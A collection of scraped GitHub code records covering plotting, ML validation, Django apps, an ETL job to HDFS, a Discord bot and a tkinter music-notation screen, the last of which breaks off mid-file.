+{"seq_id":"3825447129","text":"# Import Python libraries\nimport pandas as pd\nimport numpy as np\nimport plotly\n\n# Display graph in offline mode\nplotly.offline.init_notebook_mode(connected=False)\n\n# Import experimemnt data spreadsheet as .csv file\nCoilData = pd.read_csv('C:/Users/K8nn8/Google Drive/School/Fall 2017/Physics 2 Electromagnetism/TeslaCoilDataCSV.csv')\n\n# Create lists of radius values for all three topload configurations\nr_Torus = (CoilData['Torus 20V (cm)'], CoilData['Torus 25V (cm)'], CoilData['Torus 30V (cm)'])\nr_Sphere = (CoilData['Sphere 20V (cm)'], CoilData['Sphere 25V (cm)'], CoilData['Sphere 30V (cm)'])\nr_None = (CoilData['None 20V (cm)'], CoilData['None 25V (cm)'], CoilData['None 30V (cm)'])\n\n# Group radius values into list 'r'\nr = [r_Torus, r_Sphere, r_None]\n\n# Define 'theta' as a fuction that rotates findings at intervals of pi/8\ntheta = np.linspace(0, 2*np.pi, 16)\n\n# List trace names under their topload categories\ntrace_Torus = ['trace_T20', 'trace_T25', 'trace_T30']\ntrace_Sphere = ['trace_S20', 'trace_S25', 'trace_S30']\ntrace_None = ['trace_N20', 'trace_N25', 'trace_N30']\n\n# Group trace names into list\ntrace_name = [trace_Torus, trace_Sphere, trace_None]\n\n# Lists of various values related to each topload type; indexed for looping\ntrace_label = ['20 Volts', '25 Volts', '30 Volts']\ntrace_color = ['blue', 'red', 'green']\ndata = ['data_Torus', 'data_Sphere', 'data_None']\ntitle = ['Tesla Coil with Torus Topload', 'Tesla Coil with Spherical Topload', 'Tesla Coil with No Topload']\nlayout = ['layout_Torus', 'layout_Sphere', 'layout_None']\nfig = ['fig_Torus', 'fig_Sphere', 'fig_None']\ngraph = ['Torus', 'Sphere', 'None']\nfilename = ['Tesla_3dScatter_Torus', 'Tesla_3dScatter_Sphere', 'Tesla_3dScatter_None']\n\n# Loop through each topload configuration\nk = 0\nfor k in range(3):\n\n # Loop through each voltage setting for each topload config\n i = 0\n for i in range(3):\n x, y, z = (r[k][i]*np.cos(theta[0]), r[k][i]*np.sin(theta[0]), CoilData['Height (cm)'])\n\n # Loop through each theta value at each voltage setting for each topload config\n j = 1\n for j in range(len(theta)):\n x = x.append(r[k][i]*np.cos(theta[j]), ignore_index=True)\n y = y.append(r[k][i]*np.sin(theta[j]), ignore_index=True)\n z = z.append(CoilData['Height (cm)'], ignore_index=True)\n j = j + 1\n\n trace_name[k][i] = plotly.graph_objs.Scatter3d(\n x=x,\n y=y,\n z=z,\n mode='markers',\n name=trace_label[i],\n marker=dict(\n size=6,\n line=dict(\n color=trace_color[i],\n width=0.5\n ),\n opacity=0.7\n )\n )\n i = i + 1\n\n data[k] = trace_name[k]\n layout[k] = plotly.graph_objs.Layout(\n title=\"\",\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0\n )\n )\n\n fig[k] = plotly.graph_objs.Figure(data=data[k], layout=layout[k])\n graph[k] = plotly.offline.plot(fig[k], filename=filename[k])\n k = k + 1\n","repo_name":"CoryK8nn8dy/TeslaCoil","sub_path":"TeslaCoilScatterPlots.py","file_name":"TeslaCoilScatterPlots.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"15767777609","text":"from model_handler import ModelHandler\nimport argparse\nimport sys\nimport os\n\ndef validate_model(model_path, data_path):\n # Get the model name from the path\n model_name = os.path.basename(os.path.dirname(os.path.dirname(model_path)))\n\n model_handler = ModelHandler(data_path=None, model_path=model_path)\n metrics = model_handler.val(TEST_DATA_PATH=data_path)\n\n # Create output directory path using metrics.save_dir\n output_dir = os.path.join(metrics.save_dir)\n\n # Make sure the directory exists\n os.makedirs(output_dir, exist_ok=True)\n\n # Redirect stdout to a file\n old_stdout = sys.stdout\n sys.stdout = open(os.path.join(output_dir, f'{model_name}_output.txt'), 'w')\n\n print(metrics)\n print(metrics.box)\n\n # Restore original stdout\n sys.stdout = old_stdout\n\n print(f'Metrics and box have been printed to {model_name}_output.txt in the directory: {output_dir}')\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('MODEL_100', type=str, help=\"Path to the first model weights\")\n parser.add_argument('MODEL_ALL', type=str, help=\"Path to the second model weights\")\n parser.add_argument('TEST_DATA', type=str, help=\"Path to the test data\")\n args = parser.parse_args()\n\n validate_model(args.MODEL_100, args.TEST_DATA)\n validate_model(args.MODEL_ALL, args.TEST_DATA)\n\n\n\n# 1. seg model poly 100 and poly all\n# python test_model_100_ALL.py runs\\segment\\seg-poly-initial\\weights\\best.pt runs\\segment\\seg_poly_AL2\\weights\\best.pt datasets\\2_tomato-test\\data.yaml\n\n# 2. seg model bb 100 and bb all\n# python test_model_100_ALL.py runs\\segment\\seg-bb-100\\weights\\best.pt runs\\segment\\seg-bb-all\\weights\\best.pt datasets\\tomato-obb\\data.yaml\n\n# 3. det model poly 100 and poly all\n# python test_model_100_ALL.py runs\\detect\\det-poly-initial\\weights\\best.pt runs\\detect\\det-poly-AL2\\weights\\best.pt datasets\\2_tomato-test\\data.yaml\n\n# 4. det model bb 100 and bb all\n# python test_model_100_ALL.py runs\\detect\\det-bb-100\\weights\\best.pt runs\\detect\\det-bb-all\\weights\\best.pt datasets\\tomato-obb\\data.yaml\n\n\n","repo_name":"jinyoonok2/YOLOv8-ADL","sub_path":"PV_project_prototype/test_model_100_ALL.py","file_name":"test_model_100_ALL.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24185064516","text":"import logging\nimport sys\n\n# Local imports\nsys.path = [\"./\", \"../\"] + sys.path\nfrom GenConfigs import *\n\nsys.path = [FAAS_ROOT + \"/synthetic_workload_invoker\"] + sys.path\nfrom commons.Logger import ScriptLogger\n\nlogger_wlch = ScriptLogger(\"workload_checker\", \"SWI.log\")\n\nsupported_distributions = {\"Poisson\", \"Uniform\"}\n\n\ndef CheckWorkloadValidity(workload):\n \"\"\"\n Checks whether a loaded workload is valid.\n \"\"\"\n logger_wlch.info(\"Started CheckWorkloadValidity\")\n # 1 - Check if the workload has been successfully read in ReadJSONConfig\n if workload is None:\n logger_wlch.info(\"Workload not valid => Terminating\")\n return False\n # 2 - Check for validity of general field\n print(workload)\n fields_to_check = [[\"test_name\", str], [\"blocking_cli\", bool]]\n for field in fields_to_check:\n try:\n print([field, workload[field[0]]])\n if type(workload[field[0]]) is not field[1]:\n test_name(\n \"Input of the \" + field[0] + \" field should be a \" + str(field[1])\n )\n return False\n except:\n logger_wlch.error(\"No \" + field[0] + \" field provided!\")\n return False\n # # 3 - Check if invocation scripts exists for all functions/applications in the workload\n application_set = set()\n distribution_set = set()\n for (instance, specs) in workload[\"instances\"].items():\n application_set.add(specs[\"application\"])\n try:\n distribution_set.add(specs[\"distribution\"])\n except:\n pass\n\n logger_wlch.info(\"Required applications: \" + str(application_set))\n # 4 - Check for supported distributions\n if not distribution_set.issubset(supported_distributions):\n logger_wlch.error(\n \"At least one specified distribution is not supported. Supported distribution(s): \"\n + str(supported_distributions)\n )\n return False\n # 5 - Check for valid test duration\n try:\n test_duration_in_seconds = workload[\"test_duration_in_seconds\"]\n if test_duration_in_seconds is None:\n logger_wlch.error(\n \"Please enter a valid value for test_duration_in_seconds field in the config file.\"\n )\n return False\n elif int(test_duration_in_seconds) <= 0:\n logger_wlch.error(\"test_duration_in_seconds should be greater than zero!\")\n return False\n except:\n logger_wlch.error(\n \"test_duration_in_seconds field not specified in the json config file\"\n )\n return False\n # 6 - Check that the random_seed field is entered\n try:\n random_seed = workload[\"random_seed\"]\n except:\n logger_wlch.error(\"No random_seed field specified in the config file\")\n return False\n\n return True\n","repo_name":"PrincetonUniversity/faas-profiler","sub_path":"synthetic_workload_invoker/WorkloadChecker.py","file_name":"WorkloadChecker.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"37"}
+{"seq_id":"74650732267","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom django.views import generic\nfrom utils.at_exceptions import BalanceError, CurrencyError\nimport shutil\n# Create your views here.\n\nfrom .models import Wallet, Balance, Operation, Currency\nfrom .graphs import operations_graph_per_balance\n\ndef get_extra_content(active_id):\n pages = ['wallets', 'balance']\n Pages = []\n for i,p in enumerate(pages):\n Pages.append({'active': i + 1 == active_id,\n 'id': i + 1, \n 'link':'portofolio:' + p,\n 'title': p[0].upper() + p[1:]\n })\n return {'pages_list':Pages, 'app':'portofolio'}\n\ndef index(request):\n Wallets = Wallet.objects.all()\n context = {'Wallets': Wallets, 'app': 'wallet'}\n return render(request, 'wallet/index.html', context)\n \ndef detail(request, wallet_id, message=''):\n ActiveWallet = Wallet.objects.get(pk=wallet_id)\n B = Balance.objects.filter(wallet = ActiveWallet)\n C = Currency.objects.all()\n balances = [{'id': bal.id, \n 'currency': bal.currency,\n 'amount': bal.amount,\n 'amount_str': '{:0.2f}'.format(bal.amount),\n 'converted': '{:0.2f}'.format(bal.converted_balance()) } for bal in B]\n total = '{:0.2f}'.format(sum([bal.converted_balance() for bal in B]) * ActiveWallet.baseCurrency.rate)\n context = {'owner': ActiveWallet.owner,\n 'wallet': ActiveWallet,\n 'balances': balances,\n 'total': total,\n 'currency': C,\n 'message': message, \n 'app': 'wallet'\n }\n return render(request, 'wallet/detail.html', context)\n\ndef balance_detail(request, balance_id):\n balance = Balance.objects.get(pk = balance_id)\n ActiveWallet = Wallet.objects.get(id=balance.wallet.id)\n operations = Operation.objects.filter(balance = balance)\n O = Operation()\n graph = operations_graph_per_balance(balance.pk)\n context = {'owner': balance.wallet.owner,'balance': balance, 'operations': operations, 'app': 'wallet','wallet': ActiveWallet, 'graph': graph}\n return render(request, 'wallet/balance_detail.html', context)\n\ndef add_valuta(request, wallet_id):\n wallet = get_object_or_404(Wallet, pk=wallet_id)\n try:\n amount = float(request.POST['amount'])\n except ValueError:\n return detail(request,wallet_id,'You must enter an amount')\n else:\n currency_abb = request.POST['currency']\n if request.POST['operation'] == 'deposit':\n wallet.addToBalance(amount, currency_abb)\n else:\n try:\n wallet.subtractFromBalance(amount, currency_abb)\n except (CurrencyError, BalanceError):\n errmsg = shutil.sys.exc_info()[1].args[0]\n return detail(request,wallet_id, errmsg)\n except:\n return detail(request,wallet_id,shutil.sys.exc_info())\n \n return HttpResponseRedirect(reverse('wallet:detail', args=(wallet_id,)))","repo_name":"oneindelijk/autotrader","sub_path":"pyTrade/wallet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9778788511","text":"# https://www.youtube.com/watch?v=dnrJ4zwCADM&list=RDCMUC87aeHqMrlR6ED0w2SVi5nw&index=29\n# not sure how good this realy is...\nimport pandas as pd\nimport yfinance as yf\nimport pandas_datareader.data as reader\nimport datetime as dt\nfrom dateutil.relativedelta import relativedelta\n\n# Get ticker symbols fro the stocks contained in DJI\ntable = pd.read_html(\"https://en.wikipedia.org/wiki/Dow_Jones_Industrial_Average\")[0] # multiple tables retrieved\ntickers = table.Symbol.tolist()\n\n# Get prices for the DJI components\nstart = dt.datetime(2018,1,31)\nend = dt.datetime(2020, 1, 31)\n\ndf = reader.get_data_yahoo(tickers, start, end)['Adj Close']\n\n# Calculate monthly returns by cumulating daily returns\nmtl_ret = df.pct_change().resample('M').agg(lambda x:(x+1).prod() -1)\nprint(mtl_ret)\n\n# Calculate returns over the past 11 months\nimport numpy as np\n\n# Getting past 11 month cumulated returns\npast_11 = (mtl_ret+1).rolling(11).apply(np.prod)-1 # 11 months\nprint(past_11)\n\n# Set Portfolio formation date\nformation = dt.datetime(2019,12,31)\nend_measurement = formation - relativedelta(months=1)\nprint(formation, end_measurement)\n\n# Get past 12 months skippping the most recent one. \nret_12 = past_11.loc[end_measurement]\nprint(ret_12) # past 12 month performance\n\n# transform to df to manipulate\nret_12 = ret_12.reset_index()\nprint(ret_12)\n\nret_12['quintile'] = pd.qcut(ret_12.iloc[:,1],5, labels=False)\nprint(ret_12)\n\nwinner = ret_12[ret_12.quintile == 4] # long\nlosers = ret_12[ret_12.quintile == 0] # short\n\n# check our monthly returns\nwinnerret = mtl_ret.loc[formation + relativedelta(months=1), df.columns.isin(winner.Symbols)]\n\n\n","repo_name":"finch1/Py-Trading","sub_path":"Momentum Strategy.py","file_name":"Momentum Strategy.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"41535906150","text":"from pathlib import Path\nimport pandas as pd\nfrom prefect import flow, task\nfrom hdfs3 import HDFileSystem\n\n@task(retries=3)\ndef fetch(dataset_url: str) -> pd.DataFrame:\n \"\"\"Read taxi data from web to pandas dataframe\"\"\"\n\n return pd.read_parquet(dataset_url)\n\n\n@task()\ndef write_local(df: pd.DataFrame, color: str, dataset_file: str) -> Path:\n \"\"\"write dataframe out locally as parquet file\"\"\"\n path = Path(f\"../data/{color}/{dataset_file}.parquet\")\n df.to_parquet(path, compression=\"gzip\")\n return path\n\n\n@task(log_prints=True)\ndef clean(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Fix dtype issues\"\"\"\n df['tpep_pickup_datetime'] = pd.to_datetime(df['tpep_pickup_datetime'])\n # df['tpep_pickup_dropoff'] = pd.to_datetime(df['tpep_pickup_dropoff'])\n print(df.head(2))\n print(f\"columns: {df.dtypes}\")\n print(f\"rows: {len(df)}\")\n return df\n\n@task(log_prints=True)\ndef write_hdfs(path: Path) -> None:\n '''write file into HDFS container'''\n\n namenode_host='localhost'\n port=8020\n\n # Connect with HaDoop File System\n print('Connecting to HDFS...')\n hdfs = HDFileSystem(namenode_host, port)\n print('Done...')\n\n #Create dir\n dir = '/phong_huynh/'\n if not hdfs.exists(dir):\n print(f\"Directory {dir} doesn't exists! Create {dir}\")\n hdfs.mkdir(dir)\n print('Done...')\n\n local_path = path\n target = str(local_path).split('/')[-1]\n\n # Pusing file into HDFS\n try:\n print(f'HDFS: Start pusing file')\n hdfs.put(local_path, f'{dir}{target}')\n print(f'HDFS: Done pushing {path} into {dir}')\n except Exception as e:\n print(f\"Error: {e}\")\n\n\n@flow()\ndef etl_to_hdfs() -> None:\n \"\"\"The main etl function\"\"\"\n color = \"yellow\"\n year = 2021\n month = 1\n dataset_file = f\"{color}_tripdata_{year}-{month:02}\"\n dataset_url=f\"https://d37ci6vzurychx.cloudfront.net/trip-data/{dataset_file}.parquet\"\n\n print(dataset_url)\n df = fetch(dataset_url)\n df_clean = clean(df)\n path = write_local(df_clean, color, dataset_file)\n write_hdfs(path)\n \n\nif __name__ == \"__main__\":\n etl_to_hdfs()\n","repo_name":"PhongHuynh0394/de-zoomcamp-learning","sub_path":"week_2/hdfs/etl_to_hdfs.py","file_name":"etl_to_hdfs.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"29851406952","text":"#!/usr/bin/python3\n'''\n Define class FileStorage\n'''\nimport json\nimport models\n\n\nclass FileStorage:\n '''\n Serializes instances to JSON file and deserializes to JSON file.\n '''\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self, cls=None):\n '''\n Return the dictionary\n '''\n new_dict = {}\n if cls is None:\n return self.__objects\n\n if cls != \"\":\n for k, v in self.__objects.items():\n if cls == k.split(\".\")[0]:\n new_dict[k] = v\n return new_dict\n else:\n return self.__objects\n\n def new(self, obj):\n '''\n Set in __objects the obj with key .id\n Aguments:\n obj : An instance object.\n '''\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n value_dict = obj\n FileStorage.__objects[key] = value_dict\n\n def save(self):\n '''\n Serializes __objects attribute to JSON file.\n '''\n objects_dict = {}\n for key, val in FileStorage.__objects.items():\n objects_dict[key] = val.to_dict()\n\n with open(FileStorage.__file_path, mode='w', encoding=\"UTF8\") as fd:\n json.dump(objects_dict, fd)\n\n def reload(self):\n '''\n Deserializes the JSON file to __objects.\n '''\n try:\n with open(FileStorage.__file_path, encoding=\"UTF8\") as fd:\n FileStorage.__objects = json.load(fd)\n for key, val in FileStorage.__objects.items():\n class_name = val[\"__class__\"]\n class_name = models.classes[class_name]\n FileStorage.__objects[key] = class_name(**val)\n except FileNotFoundError:\n pass\n\n def delete(self, obj=None):\n '''\n Deletes an obj\n '''\n if obj is not None:\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n FileStorage.__objects.pop(key, None)\n self.save()\n\n def close(self):\n '''\n Deserialize JSON file to objects\n '''\n self.reload()\n\n def get(self, cls, id):\n '''\n A method to retrieve one object\n Args:\n cls: string representing the class name\n id: string representing the object ID\n Returns:\n '''\n temp_dict = {}\n if id is None:\n return None\n if id != \"\":\n for k, v in self.__objects.items():\n if id == k.split(\".\")[1]:\n temp_dict[k] = v\n return temp_dict.get(k)\n else:\n return None\n\n def count(self, cls=None):\n '''\n A method to count the number of objects in storage\n Args:\n cls: string representing the class name\n '''\n count = 0\n if cls == \"\":\n return None\n if cls is None:\n for k, v in self.__objects.items():\n count += 1\n return count\n else:\n for k, v in self.__objects.items():\n if cls == k.split(\".\")[0]:\n count += 1\n return count\n","repo_name":"thirdcaptain/AirBnB_clone_v3","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71349050026","text":"import discord\nfrom discord.ext import commands\nimport os\nimport asyncio\nimport random\n\nbot = commands.Bot(command_prefix=\"instinct!\", description=\"Survival Is Key.\")\n\n@bot.event\nasync def on_ready():\n print(\"REX_101 is now online, and ready to wreck havoc. >:D\")\n\n \n \n\n@bot.command()\nasync def introduction(ctx):\n await ctx.send(\"RAWR! BEEP-BOOP-BEEP-BOOP. Hello there human! I am REX_101! The security and interigations bot for this server! :sunglasses:\")\n await ctx.send(\"I hope we can get along nicely :smiley:\")\n await ctx.send(\":thinking: **What am I?** I am the bot from the sole-purpose of the Roblox gaming company Instinct Survivial™!\")\n await ctx.send(\":scream: **Can I be in your server?** No, not at the moment, Uncle Endy says I am in Early-stage development, which means...\")\n await ctx.send(\":warning: **COMPUTING...** \")\n await ctx.send(\"Nope! Not just yet c;\")\n await ctx.send(\"Well I hope that has answered some of your non-dino brain questions! If you require further assitónce with my commands, a list of them, or further FAQ's, run \\\"instinct!help\\\":sparkles: :tada:\")\n await ctx.send(\"Most importantly, always remember: **Survival is key.** :grinning:\")\n \n@bot.command()\nasync def say(ctx, *, something):\n await ctx.send(something)\n \n@bot.command()\nasync def kick(ctx, member: discord.Member):\n await member.kick()\n await ctx.send(\"**User was successfully kicked!** :white_check_mark:\")\n \n# ----------------------------------------------------------------------------------------\n \n@bot.group(invoke_without_subcommand=True)\nasync def idiot(ctx):\n await ctx.send(\"**Invalid Syntax :x::** Please @MENTION the user to use this command.\")\n\n@idiot.command(name=\"AdamHartford\")\nasync def idiot_AdamHartford(ctx):\n await ctx.send(\"@AdamHartford#8272 You are an idiot! :D \")\n\n@idiot.command(name=\"aussiepopcorn\")\nasync def idiot_aussiepopcorn(ctx):\n await ctx.send(\"@aussiepopcorn#3943 You are an idiot! :D\")\n \n@idiot.command(name=\"Enderxcthz\")\nasync def idiot_Enderxcthz(ctx):\n await ctx.send(\"Yo shut up idiot, tryna call my man, the myth, the legend Enderxcthz an \\\"idiot\\\"? Get the hell outta here :clap:\")\n \n\nbot.run(os.environ['TOKEN'])\n","repo_name":"K4K4SH11/REX101","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10064278112","text":"from collections import OrderedDict\nfrom django import forms\nfrom dal_select2.widgets import ModelSelect2Multiple\nfrom panels.models import Level4Title\nfrom panels.models import GenePanel\nfrom panels.models import GenePanelSnapshot\nfrom panels.models import PanelType\n\n\nclass PanelForm(forms.ModelForm):\n level2 = forms.CharField(required=False)\n level3 = forms.CharField(required=False)\n level4 = forms.CharField()\n description = forms.CharField(widget=forms.Textarea)\n omim = forms.CharField(required=False)\n orphanet = forms.CharField(required=False)\n hpo = forms.CharField(required=False)\n status = forms.ChoiceField(\n required=True, choices=GenePanel.STATUS, initial=GenePanel.STATUS.internal\n )\n\n child_panels = forms.ModelMultipleChoiceField(\n label=\"Child Panels\",\n required=False,\n queryset=GenePanelSnapshot.objects.get_active_annotated().exclude(\n is_super_panel=True\n ),\n widget=ModelSelect2Multiple(\n url=\"autocomplete-simple-panels\", attrs={\"data-minimum-input-length\": 3}\n ),\n )\n\n types = forms.ModelMultipleChoiceField(\n label=\"Panel Types\",\n required=False,\n queryset=PanelType.objects.all(),\n widget=ModelSelect2Multiple(\n url=\"autocomplete-simple-panel-types\",\n attrs={\"data-minimum-input-length\": 1},\n ),\n )\n\n class Meta:\n model = GenePanelSnapshot\n fields = (\"old_panels\",)\n\n def __init__(self, *args, **kwargs):\n gel_curator = kwargs.pop(\"gel_curator\")\n self.request = kwargs.pop(\"request\")\n\n super().__init__(*args, **kwargs)\n\n original_fields = self.fields\n\n self.fields = OrderedDict()\n self.fields[\"level2\"] = original_fields.get(\"level2\")\n self.fields[\"level3\"] = original_fields.get(\"level3\")\n self.fields[\"level4\"] = original_fields.get(\"level4\")\n self.fields[\"description\"] = original_fields.get(\"description\")\n self.fields[\"omim\"] = original_fields.get(\"omim\")\n self.fields[\"orphanet\"] = original_fields.get(\"orphanet\")\n self.fields[\"hpo\"] = original_fields.get(\"hpo\")\n self.fields[\"old_panels\"] = original_fields.get(\"old_panels\")\n self.fields[\"types\"] = original_fields.get(\"types\")\n if gel_curator: # TODO (Oleg) also check if we have entities in this panel\n self.fields[\"child_panels\"] = original_fields.get(\"child_panels\")\n self.fields[\"status\"] = original_fields.get(\"status\")\n\n if self.instance.pk:\n self.fields[\"status\"].initial = self.instance.panel.status\n if gel_curator:\n self.fields[\n \"child_panels\"\n ].initial = self.instance.child_panels.values_list(\"pk\", flat=True)\n self.fields[\"types\"].initial = self.instance.panel.types.values_list(\n \"pk\", flat=True\n )\n\n def clean_level4(self):\n if (\n not self.instance.pk\n or self.cleaned_data[\"level4\"] != self.instance.level4title.name\n ):\n if (\n GenePanelSnapshot.objects.get_active(all=True, internal=True)\n .exclude(panel__status=GenePanel.STATUS.deleted)\n .filter(level4title__name=self.cleaned_data[\"level4\"])\n .exists()\n ):\n raise forms.ValidationError(\"Panel with this name already exists\")\n\n return self.cleaned_data[\"level4\"]\n\n def clean_omim(self):\n return self._clean_array(self.cleaned_data[\"omim\"])\n\n def clean_orphanet(self):\n return self._clean_array(self.cleaned_data[\"orphanet\"])\n\n def clean_hpo(self):\n return self._clean_array(self.cleaned_data[\"hpo\"])\n\n def save(self, *args, **kwargs):\n new_level4 = Level4Title(\n level2title=self.cleaned_data[\"level2\"].strip(),\n level3title=self.cleaned_data[\"level3\"].strip(),\n 
name=self.cleaned_data[\"level4\"].strip(),\n description=self.cleaned_data[\"description\"].strip(),\n omim=self.cleaned_data[\"omim\"],\n hpo=self.cleaned_data[\"hpo\"],\n orphanet=self.cleaned_data[\"orphanet\"],\n )\n\n activities = []\n\n if self.instance.id:\n current_instance = GenePanelSnapshot.objects.get(pk=self.instance.id)\n\n panel = self.instance.panel\n level4title = self.instance.level4title\n\n data_changed = False\n if level4title.dict_tr() != new_level4.dict_tr():\n data_changed = True\n new_level4.save()\n if level4title.name != new_level4.name:\n activities.append(\n \"Panel name changed from {} to {}\".format(\n level4title.name, new_level4.name\n )\n )\n\n if level4title.hpo != new_level4.hpo:\n activities.append(\n \"HPO terms changed from {} to {}\".format(\n \", \".join(level4title.hpo), \", \".join(new_level4.hpo)\n )\n )\n\n self.instance.level4title = new_level4\n self.instance.panel.name = new_level4.name\n\n if \"old_panels\" in self.changed_data:\n activities.append(\n \"List of related panels changed from {} to {}\".format(\n \"; \".join(current_instance.old_panels),\n \"; \".join(self.cleaned_data[\"old_panels\"]),\n )\n )\n self.instance.old_panels = self.cleaned_data[\"old_panels\"]\n\n if \"status\" in self.changed_data:\n activities.append(\n \"Panel status changed from {} to {}\".format(\n current_instance.panel.status, self.cleaned_data[\"status\"]\n )\n )\n self.instance.panel.status = self.cleaned_data[\"status\"]\n\n update_stats_superpanel = True\n if \"child_panels\" in self.changed_data:\n self.instance.child_panels.set(self.cleaned_data[\"child_panels\"])\n activities.append(\n \"Changed child panels to: {}\".format(\n \"; \".join(\n self.instance.child_panels.values_list(\n \"panel__name\", flat=True\n )\n )\n )\n )\n update_stats_superpanel = False\n\n if \"types\" in self.changed_data:\n panel.types.set(self.cleaned_data[\"types\"])\n activities.append(\n \"Panel types changed to {}\".format(\n \"; \".join(panel.types.values_list(\"name\", flat=True))\n )\n )\n\n if data_changed or self.changed_data:\n self.instance.increment_version()\n panel.save()\n self.instance._update_saved_stats(use_db=update_stats_superpanel)\n else:\n panel.save()\n\n else:\n panel = GenePanel.objects.create(\n name=self.cleaned_data[\"level4\"].strip(),\n status=self.cleaned_data[\"status\"],\n )\n new_level4.save()\n\n activities.append(\"Added Panel {}\".format(panel.name))\n if self.cleaned_data[\"old_panels\"]:\n activities.append(\n \"Set list of related panels to {}\".format(\n \"; \".join(self.cleaned_data[\"old_panels\"])\n )\n )\n\n self.instance.panel = panel\n self.instance.level4title = new_level4\n self.instance.old_panels = self.cleaned_data[\"old_panels\"]\n self.instance.save()\n if self.cleaned_data.get(\"child_panels\"):\n self.instance.child_panels.set(self.cleaned_data[\"child_panels\"])\n self.instance.major_version = max(\n self.instance.child_panels.values_list(\"major_version\", flat=True)\n )\n self.instance.save(update_fields=[\"major_version\"])\n self.instance._update_saved_stats(use_db=False)\n activities.append(\n \"Set child panels to: {}\".format(\n \"; \".join(\n list(\n self.instance.child_panels.values_list(\n \"panel__name\", flat=True\n )\n )\n )\n )\n )\n if self.cleaned_data.get(\"types\"):\n panel.types.set(self.cleaned_data[\"types\"])\n activities.append(\n \"Set panel types to: {}\".format(\n \"; \".join(panel.types.values_list(\"name\", flat=True))\n )\n )\n\n if activities:\n panel.add_activity(self.request.user, 
\"\\n\".join(activities))\n\n @staticmethod\n def _clean_array(data, separator=\",\"):\n return [x.strip() for x in data.split(separator) if x.strip()]\n","repo_name":"genomicsengland/panelapp","sub_path":"panelapp/panels/forms/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
+{"seq_id":"36610556503","text":"import json\nimport tkinter as tk\nfrom PIL import Image, ImageTk\nfrom src.dict.res_dict import resolution_dictionary\nfrom vendor.rp import resource_path\n\n\nclass Notation:\n def __init__(self, root):\n \"\"\"\n Notation screen object\n :param root: tkinter window object\n \"\"\"\n with open(resource_path('profile/account.json')) as statistics:\n self.stats = json.loads(statistics.read())\n\n with open(resource_path('settings/settings.json')) as settings:\n self.data = json.loads(settings.read())\n\n self.root = root\n\n height = resolution_dictionary[self.data[\"resolution\"]][1]\n self.coefficient = height/540\n\n exercises = Image.open(resource_path(\"img/text/notationtraining.png\"))\n exercises = exercises.resize((round(450 * self.coefficient), round(103 * self.coefficient)))\n exercisesphoto = ImageTk.PhotoImage(exercises)\n\n GLabel_771 = tk.Label(self.root)\n GLabel_771[\"fg\"] = \"#333333\"\n GLabel_771[\"justify\"] = \"center\"\n GLabel_771[\"image\"] = exercisesphoto\n GLabel_771.place(x=round(255 * self.coefficient), y=round(30 * self.coefficient), width=round(450 * self.coefficient), height=round(103 * self.coefficient))\n\n note = Image.open(resource_path(\"img/text/note.png\"))\n note = note.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n notephoto = ImageTk.PhotoImage(note)\n\n GButton_181 = tk.Button(self.root)\n GButton_181['bd'] = 0\n GButton_181[\"bg\"] = \"#f0f0f0\"\n GButton_181[\"fg\"] = \"#000000\"\n GButton_181[\"justify\"] = \"center\"\n GButton_181[\"image\"] = notephoto\n GButton_181.place(x=round(140 * self.coefficient), y=round(200 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_181[\"command\"] = self.GButton_181_command\n\n interval = Image.open(resource_path(\"img/text/interval.png\"))\n interval = interval.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n intervalphoto = ImageTk.PhotoImage(interval)\n\n GButton_257 = tk.Button(self.root)\n GButton_257['bd'] = 0\n GButton_257[\"bg\"] = \"#f0f0f0\"\n GButton_257[\"fg\"] = \"#000000\"\n GButton_257[\"justify\"] = \"center\"\n GButton_257[\"image\"] = intervalphoto\n GButton_257.place(x=round(520 * self.coefficient), y=round(200 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_257[\"command\"] = self.GButton_257_command\n\n keysignature = Image.open(resource_path(\"img/text/keysignature.png\"))\n keysignature = keysignature.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n keysignaturephoto = ImageTk.PhotoImage(keysignature)\n\n GButton_348 = tk.Button(self.root)\n GButton_348['bd'] = 0\n GButton_348[\"bg\"] = \"#f0f0f0\"\n GButton_348[\"fg\"] = \"#000000\"\n GButton_348[\"justify\"] = \"center\"\n GButton_348[\"image\"] = keysignaturephoto\n GButton_348.place(x=round(140 * self.coefficient), y=round(380 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_348[\"command\"] = self.GButton_348_command\n\n chord = 